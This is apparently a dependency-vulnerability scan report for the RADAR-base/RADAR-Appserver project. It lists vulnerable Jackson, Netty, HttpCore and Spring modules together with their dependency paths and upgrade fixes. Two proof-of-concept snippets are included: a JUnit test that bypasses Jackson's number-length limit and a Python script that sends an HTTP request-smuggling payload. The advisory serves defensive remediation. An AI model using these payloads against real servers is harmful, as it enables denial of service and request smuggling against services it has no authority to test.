Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.19.1, com.fasterxml.jackson.core:jackson-databind@2.19.1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.radarbase:radar-auth@2.1.0 › com.auth0:java-jwt@4.4.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.
PoC
The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.
package tools.jackson.core.unittest.dos;
import java.nio.charset.StandardCharsets;
import org.junit.jupiter.api.Test;
import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;
import static org.junit.jupiter.api.Assertions.*;
/**
* POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
*
* Authors: sprabhav7, rohan-repos
*
* maxNumberLength default = 1000 characters (digits).
* A number with more than 1000 digits should be rejected by any parser.
*
* BUG: The async parser never calls resetInt()/resetFloat() which is where
* validateIntegerLength()/validateFPLength() lives. Instead it calls
* _valueComplete() which skips all number length validation.
*
* CWE-770: Allocation of Resources Without Limits or Throttling
*/
class AsyncParserNumberLengthBypassTest {
private static final int MAX_NUMBER_LENGTH = 1000;
private static final int TEST_NUMBER_LENGTH = 5000;
private final JsonFactory factory = new JsonFactory();
// CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
@Test
void syncParserRejectsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
// Output to console
System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
try {
try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
}
}
}
fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
} catch (StreamConstraintsException e) {
System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
}
}
// VULNERABILITY: Async parser accepts the SAME number that sync rejects
@Test
void asyncParserAcceptsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
NonBlockingByteArrayJsonParser p =
(NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
p.feedInput(payload, 0, payload.length);
p.endOfInput();
boolean foundNumber = false;
try {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
foundNumber = true;
String numberText = p.getText();
assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
"Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
}
}
// Output to console
System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
} catch (StreamConstraintsException e) {
fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
}
p.close();
}
private byte[] buildPayloadWithLongInteger(int numDigits) {
StringBuilder sb = new StringBuilder(numDigits + 10);
sb.append("{\"v\":");
for (int i = 0; i < numDigits; i++) {
sb.append((char) ('1' + (i % 9)));
}
sb.append('}');
return sb.toString().getBytes(StandardCharsets.UTF_8);
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.
References
high severity
new
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.19.1, com.fasterxml.jackson.core:jackson-databind@2.19.1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.2.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.2.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.radarbase:radar-auth@2.1.0 › com.auth0:java-jwt@4.4.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.21.2 or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.Final
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling in the parsing of quoted strings within chunked transfer encoding extension values. An attacker can inject arbitrary HTTP requests into a connection by crafting chunk extensions containing carriage return or line feed bytes, leading to parsing discrepancies between the server and RFC-compliant intermediaries.
PoC
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.12.Final or higher.
References
high severity
new
- Vulnerable module: org.apache.httpcomponents.core5:httpcore5-h2
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.google.firebase:firebase-admin@9.8.0 › org.apache.httpcomponents.client5:httpclient5@5.3.1 › org.apache.httpcomponents.core5:httpcore5-h2@5.2.4
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) due to incorrect stream accounting in the handling of server-sent stream resets. An attacker can cause excessive server resource consumption by rapidly opening streams and triggering resets using malformed frames or flow control errors, resulting in the server processing an unbounded number of concurrent streams on a single connection.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.3.5 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-aop@6.2.10, org.springframework.boot:spring-boot-starter-security@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
